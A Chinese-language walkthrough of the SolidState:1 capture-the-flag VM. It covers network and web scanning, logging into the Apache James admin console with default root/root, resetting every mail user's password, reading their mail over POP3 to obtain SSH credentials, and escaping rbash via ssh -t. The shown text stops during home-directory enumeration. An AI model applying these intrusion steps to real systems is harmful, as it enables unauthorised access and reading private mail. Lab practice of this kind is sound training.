红队打靶练习:SOLIDSTATE: 1

信息收集

1、arp

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.137  00:50:56:27:5d:9b       VMware, Inc.
192.168.12.254  00:50:56:e4:dd:fa       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.358 seconds (108.57 hosts/sec). 4 responded

2、neidiscover

netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.137  00:50:56:27:5d:9b      1      60  VMware, Inc.
 192.168.12.254  00:50:56:e4:dd:fa      1      60  VMware, Inc.

3、nmap

主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:45 CST
Nmap scan report for 192.168.12.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.00020s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.137
Host is up (0.00015s latency).
MAC Address: 00:50:56:27:5D:9B (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00070s latency).
MAC Address: 00:50:56:E4:DD:FA (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.34 seconds

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.137 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:45 CST
Nmap scan report for 192.168.12.137
Host is up (0.0041s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
MAC Address: 00:50:56:27:5D:9B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds


快速提取端口

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | head -n 11 | tail -n 6 | awk '{print $1}' | awk -F "/" '{print($1)}' | xargs -n 6 | sed 's/ /,/g'
22,25,80,110,119,4555

信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -PN -p 22,25,80,110,119,4555 192.168.12.137 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:48 CST
Nmap scan report for 192.168.12.137
Host is up (0.00041s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.12.128 [192.168.12.128])
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:50:56:27:5D:9B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.12.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.40 seconds

漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,25,80,110,119,4555 192.168.12.137 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:51 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.137
Host is up (0.00017s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/ie/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (de
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.12.137
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.12.137:80/
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.12.137:80/about.html
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.12.137:80/index.html
|     Form id: name
|     Form action: #
|
|     Path: http://192.168.12.137:80/services.html
|     Form id: name
|_    Form action: #
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip
MAC Address: 00:50:56:27:5D:9B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 70.91 seconds

4、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.137 nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.137
+ Target Hostname:    192.168.12.137
+ Target Port:        80
+ Start Time:         2023-12-18 08:52:25 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ RFC-1918 /images: IP address found in the 'location' header. The IP is "fe80::c891:4b70:1cf0:a0fe". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "fe80::c891:4b70:1cf0:a0fe". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5575af6de9eb2, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /images/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-12-18 08:52:41 (GMT8) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.137
WhatWeb report for http://192.168.12.137
Status    : 200 OK
Title     : Home - Solid State Security
IP        : 192.168.12.137
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], Email[webadmin@solid-state-security.com], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery, Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Email ]
        Extract email addresses. Find valid email address and
        syntactically invalid email addresses from mailto: link
        tags. We match syntactically invalid links containing
        mailto: to catch anti-spam email addresses, eg. bob at
        gmail.com. This uses the simplified email regular
        expression from
        http://www.regular-expressions.info/email.html for valid
        email address matching.

        String       : webadmin@solid-state-security.com

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 18 Dec 2023 00:54:14 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Tue, 22 Aug 2017 17:31:24 GMT
        ETag: "1e60-5575af6de9eb2-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2383
        Connection: close
        Content-Type: text/html

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

110/tcp  open  pop3        JAMES pop3d 2.3.2

119/tcp  open  nntp        JAMES nntpd (posting ok)

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

目录探测

1、gobuster

┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.137 -x php,txt,html,bak -w /usr/share/dirb                                                                                                                                                                          uster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-m                                                                                                                                                                          edium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7776]
/.html                (Status: 403) [Size: 294]
/images               (Status: 301) [Size: 317] [--> http://192.168.12.137/image                                                                                                                                                                          s/]
/about.html           (Status: 200) [Size: 7182]
/services.html        (Status: 200) [Size: 8404]
/assets               (Status: 301) [Size: 317] [--> http://192.168.12.137/asset                                                                                                                                                                          s/]
/README.txt           (Status: 200) [Size: 963]
/LICENSE.txt          (Status: 200) [Size: 17128]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]

2、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.137 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.137/_23-12-18_09-00-07.txt

Target: http://192.168.12.137/

[09:00:07] Starting:
[09:00:09] 403 -  300B  - /.httr-oauth
[09:00:09] 403 -  303B  - /.htpasswd_test
[09:00:12] 200 -    3KB - /about.html
[09:00:22] 200 -  472B  - /assets/
[09:00:22] 301 -  317B  - /assets  ->  http://192.168.12.137/assets/
[09:00:35] 200 -  571B  - /images/
[09:00:35] 301 -  317B  - /images  ->  http://192.168.12.137/images/
[09:00:38] 200 -    6KB - /LICENSE.txt
[09:00:48] 200 -  606B  - /README.txt

Task Completed

3、dirb

┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.12.137

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Dec 18 09:00:23 2023
URL_BASE: http://192.168.12.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.12.137/ ----
==> DIRECTORY: http://192.168.12.137/assets/
==> DIRECTORY: http://192.168.12.137/images/
+ http://192.168.12.137/index.html (CODE:200|SIZE:7776)
+ http://192.168.12.137/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.12.137/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.12.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Dec 18 09:00:34 2023
DOWNLOADED: 4612 - FOUND: 2

110/tcp  open  pop3        JAMES pop3d 2.3.2
pop3是james的邮局服务协议，可以通过pop3协议来读邮件！

119/tcp  open  nntp        JAMES nntpd (posting ok)
119端口正在运行一个叫做 JAMES nntpd 的 NNTP（网络新闻传输协议）服务。
JAMES nntpd (posting ok) 表示这个 NNTP 服务允许用户发布（posting）新闻文章。
JAMES nntpd 可能是指 JAMES 邮件服务器的 NNTP 服务的一个组件。
NNTP 是用于阅读和发布 USENET 新闻组文章的协议。


4555/tcp open  james-admin JAMES Remote Admin 2.3.2

JAMES 是 邮件服务器的远程管理工具，是一个java写的工具，版本为2.3.2。

WEB

经过搜索，Apache James 2.3.2的默认登录账号以及密码都是root root

james登录

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 4555
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root

Welcome root. HELP for a list of commands
help

Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit
                                    close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james root
Password for james reset
setpassword thomas root
Password for thomas reset
setpassword john root
Password for john reset
setpassword mindy root
Password for mindy reset
setpassword mailadmin root
Password for mailadmin reset

listusers 列出所有用户

setpassword username password   改密码

user: james
user: thomas
user: john
user: mindy
user: mailadmin

Telnet登录

1、查看邮件

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user james
+OK
pass root
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.


第一个用户没有邮件。

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user thomas
+OK
pass root
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
Connection closed by foreign host.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mailadmin
+OK
pass root
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

经过telnet服务登录查看邮件发现只有john和mindy用户有邮件。

要通过 Telnet 连接到 POP3（邮局协议3）服务并读取邮件，我们有以下步骤操作：

2. 使用 Telnet 命令连接到目标主机的 POP3 服务

   telnet <pop3服务器地址> 110
   
   <pop3服务器地址>应替换为我们要连接的 POP3 服务器的实际地址。

3. 输入用户身份验证信息，通常包括用户名和密码：
   USER your_username
   PASS your_password
   
   将 your_username 和 your_password 替换为你的 POP3 账户的实际用户名和密码。

4. 列出邮件：
   LIST

5. 选择要读取的邮件：
   RETR 1

   这里的 "1" 就是我们想要读取的邮件编号。

这样我们就可以通过 Telnet 连接到 POP3 服务器并读取邮件。

2、读取邮件

john邮件

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James


约翰，
你能不能限制mindy的访问权限，直到她读到这个程序。还要确保你给她发了一个临时密码来登录她的账户。
提前谢谢。
恕我直言，
詹姆斯

mindy邮件

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.

尊敬的Mindy：，
欢迎加入固态安全网络团队！我们很高兴你能以初级国防分析师的身份加入我们。你的角色对完成我们组织的使命至关重要。所附信息旨在介绍网络安全，并提供资源，帮助您顺利过渡到新角色。网络团队在这里支持您的过渡，因此，请知道您可以致电我们中的任何人来帮助您。
我们期待您加入我们的团队，并在Solid State Security取得成功。
恕我直言，
詹姆斯



retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

尊敬的Mindy：，
以下是您访问系统的ssh凭据。记得在第一次登录后重置密码。
您的访问目前受到限制，请随时要求您的主管将您需要的任何命令添加到您的路径中。



username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

这两封邮件挺有意思，总之ssh登录账号以及密码给我们了。我们进行下一步！

SSH登录

┌──(root㉿ru)-[~/kali]
└─# ssh mindy@192.168.12.137
The authenticity of host '192.168.12.137 (192.168.12.137)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.137' (ED25519) to the list of known hosts.
mindy@192.168.12.137's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
mindy@solidstate:~$ cd bin
-rbash: cd: restricted
mindy@solidstate:~$

我们获得了初级权限，并拿到了windy的flag，但是我们需要拿到root权限，部分命令权限没有对我们开放，这里使用了rbash限制了我们的部分命令。我们尝试绕过！

┌──(root㉿ru)-[~/kali]
└─# ssh mindy@192.168.12.137 -t "bash --noprofile"
mindy@192.168.12.137's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /home
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls -al
total 16
drwxr-xr-x  4 root  root    4096 Aug 22  2017 .
drwxr-xr-x 22 root  root    4096 Jun 18  2017 ..
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 james
drwxr-x---  4 mindy mindy   4096 Aug 22  2017 mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$



ssh绕过rbash

${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ ls -al
total 8
drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 .
drwxr-x--- 4 mindy mindy 4096 Aug 22  2017 ..
lrwxrwxrwx 1 root  root     8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root  root     8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root  root     7 Aug 22  2017 ls -> /bin/ls
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$


如果没有绕过只能使用  cat、env、ls这三个命令！

${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james  mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd james/
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls -al
total 84
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x  4 root  root    4096 Aug 22  2017 ..
-rw-------  1 james osboxes  108 Aug 22  2017 .bash_history
-rw-r--r--  1 james osboxes  220 Jun 18  2017 .bash_logout
-rw-r--r--  1 james osboxes 3526 Jun 18  2017 .bashrc
drwx------  8 james osboxes 4096 Aug 22  2017 .cache
drwx------ 10 james osboxes 4096 Aug 22  2017 .config
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Desktop
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Documents
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Downloads
drwx------  3 james osboxes 4096 Aug 22  2017 .gnupg
-rw-------  1 james osboxes  640 Aug 22  2017 .ICEauthority
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .local
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Music
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .nano
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Pictures
-rw-r--r--  1 james osboxes  675 Jun 18  2017 .profile
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Public
drwx------  2 james osboxes 4096 Aug 22  2017 .ssh
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Templates
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Videos
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls -alR
.:
total 84
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 .
drwxr-xr-x  4 root  root    4096 Aug 22  2017 ..
-rw-------  1 james osboxes  108 Aug 22  2017 .bash_history
-rw-r--r--  1 james osboxes  220 Jun 18  2017 .bash_logout
-rw-r--r--  1 james osboxes 3526 Jun 18  2017 .bashrc
drwx------  8 james osboxes 4096 Aug 22  2017 .cache
drwx------ 10 james osboxes 4096 Aug 22  2017 .config
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Desktop
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Documents
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Downloads
drwx------  3 james osboxes 4096 Aug 22  2017 .gnupg
-rw-------  1 james osboxes  640 Aug 22  2017 .ICEauthority
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .local
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Music
drwxr-xr-x  2 james osboxes 4096 Aug 22  2017 .nano
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Pictures
-rw-r--r--  1 james osboxes  675 Jun 18  2017 .profile
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Public
drwx------  2 james osboxes 4096 Aug 22  2017 .ssh
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Templates
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 Videos
ls: cannot open directory './.cache': Permission denied
ls: cannot open directory './.config': Permission denied

./Desktop:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Documents:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..

./Downloads:
total 8
drwxr-xr-x  2 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
ls: cannot open directory './.gnupg': Permission denied

./.local:
total 12
drwxr-xr-x  3 james osboxes 4096 Jun 18  2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22  2017 ..
